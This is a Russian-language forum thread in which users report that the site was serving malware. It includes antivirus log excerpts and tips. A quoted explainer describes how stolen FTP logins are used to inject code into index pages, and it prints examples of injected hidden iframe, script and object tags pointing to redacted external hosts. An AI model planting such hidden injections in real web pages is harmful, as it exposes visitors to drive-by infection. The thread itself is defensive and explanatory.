member+
Статус: Не в сети Регистрация: 16.01.2004 Откуда: Estonia,Tallinn
Для тех кто режет рекламу и не имеет антивиря поставьте фильтр на "http://trafficroad.org/*" и не бойтесь пока что ничего. А вообще что-то мне подсказывает что этот вирус опасен только для пользователей IE (информация неподтверждённая, я могу ошибаться)
member+
Статус: Не в сети Регистрация: 16.01.2004 Откуда: Estonia,Tallinn
gf34ggg55 писал(а):
всем пихануть рекламу в наглую
Нет просто положить ламерам всю систему, чтоб юзеров (которые не умеют от вирусов защищаться) выгнать, тут территория оверов (читай специалистов) а не чайников
ЗЫ предупреждение за офтоп можете давать, просто не мог промолчать.
Advanced member
Статус: Не в сети Регистрация: 27.02.2007 Откуда: Москва Фото: 56
Aeg писал(а):
02.01.2010 14:44:22 Защита в режиме реального времени файл C:\WINDOWS\system32\drivers\zgcascqab5.sys Win32/Rootkit.Agent.NPK троянская программа очищен удалением - изолирован NT AUTHORITY\SYSTEM Событие произошло в новом файле, созданном следующим приложением: C:\DOCUME~1\Admin\LOCALS~1\Temp\hiddenForm.exe.
Венда такая венда Пропатчил бы хоть, чтобы не позориться.
Advanced guest
Статус: Не в сети Регистрация: 03.12.2004
Походу ругается-не ругается зависит еще и от дырявости винды. У меня сейчас мелкомягкий антивирь (судя по вирустотал он заразу знает) промолчал, но я ничего и не поймал при этом. Просто все заплатки стоят, UAC включен, IE в своем "безопасном режиме" (т.е. по правам в системе обрезан по самое нехочу). А когда антивирь находит что-то, но делает это уже с успешно проинсталлированным в system32\drivers файлом, тут есть над чем задуматься...
_________________ Unfortunately for you, however, you are maidenless
Заблокирован Статус: Не в сети Регистрация: 28.02.2008
Operaman писал(а):
Интересно, в чём была причина
Вот типа того
Цитата:
Как происходит заражение сайта
Специальная программа заходит на каждый сервер из базы с помощью похищенного логина и пароля. Там она ищет файлы стандартные для большинства веб-сайтов, например, ‘index.php’, ‘index.asp’, ‘index.html’ и т.д., и меняет их содержимое так, чтобы отображение такой страницы на пользовательском компьютере могло вызвать его заражение.
Так как списки для FTP доступа могут многократно перепродаваться на закрытых форумах, заражение одних и тех же сайтов может происходить разными вирусами и не один раз. Как выглядит вредоносный код
Примеры. Вредоносный код может добавлять к страницам такие конструкции:
<iframe src=”http: //****-*******.net/?click=12078406″ width=1 height=1 style=”visibility:hidden;position:absolute”></iframe> или
<script src=http: //www.****.ru/script.js></script> или такой
<object data=’http: //***.name/in.cgi?2 ‘ type=’text/html’ style=’display:none’></object> А баннерная система для взрослых может использовать такой код:
<script language=”javascript”> var xxxwidth= 300; var xxxheight= 100; var xxxbgcolor= ”; var xxxcolor= ‘blue’; var xxxsize= 16; var xxxcount= 5; </script> <script language=”javascript” src=”http: //*****-*****.ru/load.php?id=330″></script> Маскировка вредоносного кода
Часто авторы кода стараются затруднить его анализ и обнаружение, используя специальные техники, называемые обфускацией (от англ. obfuscation). Почему происходит заражение? Казалось бы, страница просто загружается браузером и отображается. Если бы в программах не было ошибок, то загрузка и отображение были бы всегда безопасными действиями. К сожалению, такие ошибки (уязвимости) есть, они и используются злоумышленниками. Хотя компании регулярно выпускают обновления для своих продуктов, злоумышленники постоянно исследуют их в поиске новых уязвимостей. Вредоносный код на загружаемой пользователем странице, выполняясь, использует уязвимости приложений, что позволяет злоумышленникам получить полный контроль над атакуемым компьютером. Специально написанная для этого программа или скрипт называется эксплойт (от англ. exploit). Эксплойты для разных типов уязвимостей объединяют в наборы (exploit packs) для повышения вероятности заражения компьютера жертвы. Для атаки используются уязвимости как в самом браузере, так и в других приложениях и дополнениях (например, в плагинах для просмотра PDF и flash).
Advanced member
Статус: Не в сети Регистрация: 16.12.2002 Откуда: TSC! | Москва
Если руководство сайта сочтёт нужным объяснить что-либо, это в его компетенции. Спасибо автору темы и другим участникам, сообщившим о проблеме, предмета для дальнейшего обсуждения не вижу, тема закрыта.
Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 18
Вы не можете начинать темы Вы не можете отвечать на сообщения Вы не можете редактировать свои сообщения Вы не можете удалять свои сообщения Вы не можете добавлять вложения